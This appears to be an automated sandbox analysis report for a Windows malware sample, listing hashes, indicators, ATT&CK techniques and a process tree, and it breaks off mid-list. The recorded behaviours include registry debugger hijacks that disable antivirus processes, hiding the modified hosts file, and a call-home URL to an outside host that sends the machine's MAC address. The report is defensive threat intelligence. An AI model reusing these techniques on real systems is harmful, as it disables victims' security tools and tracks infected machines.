32139691861cc3a58aa7b6ebf877082b70a6a506774b1f527d96d790ee263444

Analysis

max time kernel
149s
max time network
144s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
26/03/2024, 23:54

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

e04601365d29ebf9ccb2be4199cf3927.exe
Size

46KB
MD5

e04601365d29ebf9ccb2be4199cf3927
SHA1

458e0c6e2794232edd009edb85161a268dce2ffc
SHA256

32139691861cc3a58aa7b6ebf877082b70a6a506774b1f527d96d790ee263444
SHA512

818c5bfcb8395e787738f5114455653df90ac25b8b63af7aa16aec696cdfbb880749a47801eec4fc65449bea2f145c16dac334ea49cc6c4b88bc497fc38c41fa
SSDEEP

768:/MVvp3w/dAuxiXsbskaRXR6PAEDH4QpTIiIkyp0Gb8BBGHA+KCp3hdLq+NY:/MVvp3w/dA9kyiDb79v2p05GF/VhduP

Score

8^/10

evasion persistence

Malware Config

Signatures

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	e04601365d29ebf9ccb2be4199cf3927.exe

Sets file execution options in registry 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQDoctor.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	e04601365d29ebf9ccb2be4199cf3927.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DrRtp.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	e04601365d29ebf9ccb2be4199cf3927.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe	e04601365d29ebf9ccb2be4199cf3927.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQDoctor.exe	e04601365d29ebf9ccb2be4199cf3927.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe	e04601365d29ebf9ccb2be4199cf3927.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	e04601365d29ebf9ccb2be4199cf3927.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	e04601365d29ebf9ccb2be4199cf3927.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RStray.exe	e04601365d29ebf9ccb2be4199cf3927.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RStray.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	e04601365d29ebf9ccb2be4199cf3927.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DrRtp.exe	e04601365d29ebf9ccb2be4199cf3927.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe	e04601365d29ebf9ccb2be4199cf3927.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	e04601365d29ebf9ccb2be4199cf3927.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
3040	attrib.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\win.ini	e04601365d29ebf9ccb2be4199cf3927.exe

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e6d61846b4c22a4c8a370b09673d3e0100000000020000000000106600000001000020000000f806e4eebc302e74a8355862a082ccdd01e2bfc32456880f92171bee45decd84000000000e80000000020000200000009d920ef59500edb1dd362fda9503a370d8496636103f54ade7f3fef36afc6cf8200000008691f69a11ba7f9986040326e45655e2ad13b35f231768c7689ef16d8581036d400000006f0354a79f021e5c5b15b3cf0063a19fbd22b0ba32d9d527a3e573f1b71bb5e0aab250142f971b75bac2280270649eb7795135d6acd19d9b0f2c2056caa6d494	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "417659216"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{49933D11-EBCC-11EE-9479-523091137F1B} = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 7084dd20d97fda01	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e6d61846b4c22a4c8a370b09673d3e01000000000200000000001066000000010000200000009ff06a54d6e5b6853d20aac7e98880a0b0d18c3db7a94207f84d9d675bfc061d000000000e800000000200002000000039cdd63147d2011d6d0c00e5da329725493173e7236156dccfe64649ee0ed65890000000d82d27b241fc599f9d587b998ab26373599052a2f1bb33dd2ab9caed030499c045ad8a2033ea1b1bb4baa0ab786d0ee24a8b8f435e1649d51f5a0f31ccd4faa1401e8fc0bf9cdbd9ef7f3935567c5416a8026857834f4f314967bf90d36b588e7350e79ad34dae48f6fb71fc5cf5350883a4c2af4f66f77b289235bd14acc68751774c724056d14f8cc243f1e5f048e94000000078feaf67115406a1fc1634b7ceedacf897a84b78c0fbbc4bd2c5021409df9494567201802c9ee04fe0d421fbdbe4d2b405c2cfb1adb2f6842a1464f6d740defe	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2044	e04601365d29ebf9ccb2be4199cf3927.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2728	iexplore.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe
2044	e04601365d29ebf9ccb2be4199cf3927.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2728	iexplore.exe
2728	iexplore.exe
2632	IEXPLORE.EXE
2632	IEXPLORE.EXE
2632	IEXPLORE.EXE
2632	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2044 wrote to memory of 2168	2044	e04601365d29ebf9ccb2be4199cf3927.exe	28
PID 2044 wrote to memory of 2168	2044	e04601365d29ebf9ccb2be4199cf3927.exe	28
PID 2044 wrote to memory of 2168	2044	e04601365d29ebf9ccb2be4199cf3927.exe	28
PID 2044 wrote to memory of 2168	2044	e04601365d29ebf9ccb2be4199cf3927.exe	28
PID 2044 wrote to memory of 3040	2044	e04601365d29ebf9ccb2be4199cf3927.exe	30
PID 2044 wrote to memory of 3040	2044	e04601365d29ebf9ccb2be4199cf3927.exe	30
PID 2044 wrote to memory of 3040	2044	e04601365d29ebf9ccb2be4199cf3927.exe	30
PID 2044 wrote to memory of 3040	2044	e04601365d29ebf9ccb2be4199cf3927.exe	30
PID 2044 wrote to memory of 2728	2044	e04601365d29ebf9ccb2be4199cf3927.exe	32
PID 2044 wrote to memory of 2728	2044	e04601365d29ebf9ccb2be4199cf3927.exe	32
PID 2044 wrote to memory of 2728	2044	e04601365d29ebf9ccb2be4199cf3927.exe	32
PID 2044 wrote to memory of 2728	2044	e04601365d29ebf9ccb2be4199cf3927.exe	32
PID 2728 wrote to memory of 2632	2728	iexplore.exe	34
PID 2728 wrote to memory of 2632	2728	iexplore.exe	34
PID 2728 wrote to memory of 2632	2728	iexplore.exe	34
PID 2728 wrote to memory of 2632	2728	iexplore.exe	34
PID 2044 wrote to memory of 1404	2044	e04601365d29ebf9ccb2be4199cf3927.exe	21
PID 2044 wrote to memory of 1404	2044	e04601365d29ebf9ccb2be4199cf3927.exe	21

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2168	attrib.exe
3040	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1404
- C:\Users\Admin\AppData\Local\Temp\e04601365d29ebf9ccb2be4199cf3927.exe
  "C:\Users\Admin\AppData\Local\Temp\e04601365d29ebf9ccb2be4199cf3927.exe"
  2⤵
  - Drops file in Drivers directory
  - Sets file execution options in registry
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:2044
- - C:\Windows\SysWOW64\attrib.exe
    attrib -s -h "C:\Windows\system32\drivers\etc\hosts"
    3⤵
    - Views/modifies file attributes
    PID:2168
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h "C:\Windows\system32\drivers\etc\hosts"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:3040
- - C:\program files\internet explorer\iexplore.exe
    "C:\program files\internet explorer\iexplore.exe" "http://qww.sux333.cn/install.asp?ver=090220&tgid=ID01&address=52-30-91-13-7F-1B&regk=1&flag=db9bed565b441362b516c9f9c6d73395&frandom=1287"
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2728
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2728 CREDAT:275457 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2632

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

Filesize
914B

MD5
e4a68ac854ac5242460afd72481b2a44

SHA1
df3c24f9bfd666761b268073fe06d1cc8d4f82a4

SHA256
cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

SHA512
5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

Filesize
252B

MD5
ba05b5062927a5368109dc29b9923dd1

SHA1
9d74129d59809c3557647aed9146757819735d8d

SHA256
09d7c824ea481f90bc1dfe23ca368a7181ba7dacbb744a03e894f8dfcce128c4

SHA512
2c2c7c6d79a8731b4792a98ea006173b35a15afc05351263e999056373404bceac18dc132d653160e8ae409499994040398de57c051db2a9d71314659f491706

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
1cdeb740a444d4a6b99e4f8b670826b6

SHA1
58b729c986725192b1cc04005ce93f4861a234b4

SHA256
ab70a8cf739467c50cadd0e35223ab6c4fa39773ae831ebfe7e34b2452d49c39

SHA512
ae6a6633ea5f9b9da72cb0fbd366eda0587b276d299b4fc5e17a05e60156dea7b36019c0131870482f704608f8cee4be6651e7375d51c91c8ed1161243fb11c8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
1a07dcf71a608a0b49a6c11b4aaae4e9

SHA1
584bd93f8acc360204e098742762da5dabdce5c4

SHA256
5458b9121b05eaf80d86c25aeca2656331eb93eaaa865fc20f68d312eb18ebf1

SHA512
ccdbe891adf66cacd0134d626b68203af3bbdd2844a151fcb527e5dae93eeba63a0dceb9ff8fd1d62b74e9ac523ad958bab41bef677530c60724578c546f7c40

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
0368f9f49b960acce1df77c271f556be

SHA1
bdc0ea7f7d2dd90e3cc568646e65e13b0603e08d

SHA256
0563768aba3d10dc78c4e188965706b65d9931ab41d6dde3d747d4bbd14a8e0e

SHA512
094a10de5a74b4f4bbc8039e9805b5b97e5cc58b005d0da9dbf19f235aa2fb464e9f32c33a94b94a47a44c57f589051d3de29937983b626e2a1ee5a186b3923d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
54bab8ed48d0cc799d87eb78b0428cdf

SHA1
21a4665e5bd2ae2cca392f7c974e0864f793c684

SHA256
c091fd20381b49c73caa748af52594d7ede70c33fdeeb7b7511bea97d09929c6

SHA512
574d893ab6d43b73b63faa5067d444fd89b9ba37d4d4efff7d813deea5ff5a1a9c2f8d6c11d6ee4e7f8802f0424f3dd3c5e05e75ec6594d42575844c155e5d24

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
39bb30b93c90e5baf466c021d7531258

SHA1
9dd989a8321352972b32e9ee72e64aa9caa25864

SHA256
b05a0594b064d3dea064699f57e29d4e4cc07880f952102223cb35b04447573b

SHA512
4181e9e9bb0215b99dfd0f3ab8f44731afc48eda908b2a6063100b23450a4b1ed57a4475c32c1e884aa6e95edf1611d506ca60654ca69546cf11efb2a59a11d3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
95865619b54e7d8d3f1a52637e80fb2f

SHA1
b7983668e16bc97f589022216c7af36ac25b96f0

SHA256
e6045f847cefb8378a6e48ee260a09c4b1daf3ff27d0ed71747251176d92a684

SHA512
1ce3f01356f3f38fcb2d026eb325f34edf2d2dc8f65880cc1ceace878b9add5000ab8d813181eb0e7607949d5fcc8e5af7bf9f615ae354196c098520582b48c3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
b916849611ffecbdd475829fc239aefa

SHA1
caf7842e7127667810ee054e0a5e622d6def4b34

SHA256
2768d00971fb43b8d808ffaaf807f390207c343a63dc16932235adb2f7d48c29

SHA512
d090dddbd29aefbd124e716039357579983ecfd741ef30e6c3a22eeb7669f4a30d0f215704f216c2f83e840eac5bcf876d56719356cf2a5beff96e0a0161e8e4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
cc66179e9987669028413d7bfdd5f3a7

SHA1
d56a1dde5eb4c92ae7665eeea95626bbe92f93ca

SHA256
